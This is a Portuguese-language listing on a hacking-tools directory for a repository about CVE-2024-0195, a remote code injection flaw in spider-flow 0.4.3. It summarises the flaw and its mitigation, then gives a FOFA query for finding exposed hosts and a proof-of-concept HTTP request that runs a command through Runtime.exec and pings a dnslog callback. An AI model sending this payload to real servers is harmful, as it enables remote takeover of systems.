Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-0195-SpiderFlow — CVE-2024-0195 Controle Impróprio da Geração de Código ('Injeção de Código') | Kitploit
Ferramentas/GitHubGitHub/gh-ost00/cve-2024-0195-spiderflow
Geração de PayloadsAnálise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubgh-ost00/cve-2024-0195-spiderflow

CVE-2024-0195-SpiderFlow

CVE-2024-0195 Controle Impróprio da Geração de Código ('Injeção de Código')

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
55há 2 anosAinda não revisado
Compartilhar

CVE-2024-0195 Controle Impróprio de Geração de Código ('Injeção de Código')

Resumo

CVE-2024-0195 é uma vulnerabilidade crítica de injeção de código na aplicação web spider-flow 0.4.3, especificamente na função FunctionService.saveFunction do arquivo FunctionController.java. Um atacante pode injetar remotamente código malicioso que é executado no servidor. Isso permite o comprometimento completo da aplicação.

Impacto

Esta vulnerabilidade é extremamente grave, pois permite a execução remota de código no servidor que hospeda a aplicação spider-flow vulnerável. Um atacante poderia comprometer totalmente o servidor, roubar dados sensíveis, instalar malware ou mineradores de criptomoedas e usá-lo para ataques adicionais dentro da rede. A confidencialidade, integridade e disponibilidade da aplicação e do servidor são todas criticamente afetadas.

Correção

Uma versão corrigida não é explicitamente mencionada, portanto a correção atualmente não parece ser uma opção. A vulnerabilidade foi divulgada publicamente e existem exploits disponíveis, portanto a mitigação imediata é crítica.

Mitigação

Até que uma correção oficial seja lançada, o spider-flow 0.4.3 deve ser imediatamente colocado offline ou o acesso restrito apenas a redes/usuários confiáveis. Firewalls de aplicação web ou outros controles de validação de entrada podem ser configurados para detectar e bloquear tentativas de ataque de injeção de código como uma mitigação provisória. No entanto, estas não são soluções completas e a versão vulnerável deve ser atualizada assim que uma versão corrigida estiver disponível.

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Exploração

FOFA : app="spiderflow"

✔ Prova de conceito

POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
Baixar ferramenta